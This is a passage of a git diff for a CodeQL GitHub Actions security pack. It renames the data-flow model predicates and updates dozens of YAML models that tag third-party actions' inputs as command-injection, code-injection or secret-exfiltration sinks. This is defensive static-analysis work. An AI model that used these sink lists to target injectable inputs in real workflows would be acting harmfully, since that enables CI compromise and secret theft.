+- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- .../ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.yml | 7 +- ql/lib/yaml.dbscheme | 80 ------------------- ql/lib/yaml.dbscheme.stats | 4 - ql/src/codeql-pack.lock.yml | 6 ++ ql/src/qlpack.yml | 3 +- ql/test/codeql-pack.lock.yml | 6 ++ ql/test/library-tests/test.ql | 4 +- ql/test/qlpack.yml | 6 +- 754 files changed, 808 insertions(+), 874 deletions(-) create mode 100644 .!79690!.DS_Store delete mode 100644 ql/lib/yaml.dbscheme delete mode 100644 ql/lib/yaml.dbscheme.stats diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 4b8239b7f6c..c50889c1885 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -1,16 +1,24 @@ --- lockVersion: 1.0.0 dependencies: - codeql/controlflow: - version: 1.0.0 codeql/dataflow: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/mad: + version: 1.0.0 + codeql/regex: + version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c46a3ee64a1..d0b84f918d5 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) { * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind, string provenance) { - Extensions::sourceModel(action, version, output, kind, provenance) +predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::actionsSourceModel(action, version, output, kind, provenance) } /** @@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind, * - kind: Either 'Taint' or 'Value' * - provenance: verification of the model */ -predicate summaryModel( +predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ) { - Extensions::summaryModel(action, version, input, output, kind, provenance) + Extensions::actionsSummaryModel(action, version, input, output, kind, provenance) } /** @@ -84,13 +84,13 @@ predicate summaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind, string provenance) { - Extensions::sinkModel(action, version, input, kind, provenance) +predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::actionsSinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind, _) and + actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint", _) and + actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind, _) and + actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 6c64b72e6b4..05f71cfc0be 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,21 +5,21 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( +extensible predicate actionsSourceModel( string action, string version, string output, string kind, string provenance ); /** * Holds if a summary model exists for the given parameters. */ -extensible predicate summaryModel( +extensible predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel( +extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index 67455900ec3..b897e8f2c5a 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 0220f0d54d8..3a5b34880b9 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 9b36680af8f..20abd532872 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index fe3c3e58b5f..dcc20433483 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 41b67c2a625..3afd9991e07 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 4d12a293696..3deae2a9f19 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7cb2e10e926..7dd0459ab7f 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 83f09bc6bde..721042aafaf 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index bdd8a8f77c9..ee4dbaf2b55 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 7e5f5c9ee6a..76ae920d255 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 8daa9a9c2b3..46f667d75a0 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 80502e487b8..4df6fe61a43 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 2a26d31feac..aab329160ea 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 82e81f55816..610d188f065 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index 58554eb3f61..b571bded8ca 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index ca99210b4c2..cd8f4f73e49 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 1563d95b0b1..6ebc3875e07 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2bb6000355d..2b2dbd014b7 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index b0c3419abe9..78b7eb1394c 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index cbe593690e4..0f146da2e0c 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index f29355d4882..483a3bf5172 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 8463ed9577b..e06e75f7a3b 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index f20a877c3d2..d0a88ff3167 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index e0fe96ff915..a29f84a55b5 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index a7489b68688..0e11fe45b42 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", 